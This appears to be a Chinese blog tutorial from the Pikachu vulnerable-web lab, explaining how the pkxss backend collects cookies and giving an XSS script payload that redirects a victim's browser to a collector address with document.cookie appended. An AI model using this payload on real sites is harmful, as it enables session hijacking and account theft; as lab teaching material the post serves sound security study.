Pikichu-xss实验案例-通过xss获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

复制代码
<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

相关推荐
陈随易27 分钟前
编程语言级别的Skill市场,AI Agent 的未来形态
前端·后端·程序员
SoaringHeart1 小时前
Flutter进阶:基于 EasyRefresh 的下拉刷新封装 n_easy_refresh_mixin.dart
前端·flutter
IT_陈寒3 小时前
Vite的热更新突然不香了,排查三小时差点砸键盘
前端·人工智能·后端
子兮曰4 小时前
Agency-Agents 深度解析:400+ AI 专家的"梦之队"如何重塑开发工作流
前端·后端·vibecoding
竹林8184 小时前
用 The Graph 查询链上数据实战:从手搓 RPC 到 Subgraph,我的 NFT 项目数据加载快了 10 倍
前端·javascript
妙码生花5 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十九):点选验证码代码逐行目检
前端·后端·go
Awu12275 小时前
⚡从零开发 Agent CLI(五)实现一个可治理、可扩展的工具系统
前端·人工智能·claude
咪库咪库咪6 小时前
Vue3-生命周期
前端
莪_幻尘6 小时前
你的 AI Skill 越多越蠢?Token 上下文爆炸的求生指南
前端·ai编程
lichenyang4537 小时前
从 has.echo 到异步 API 注册表:一次 ASCF API 回调不触发的排查复盘
前端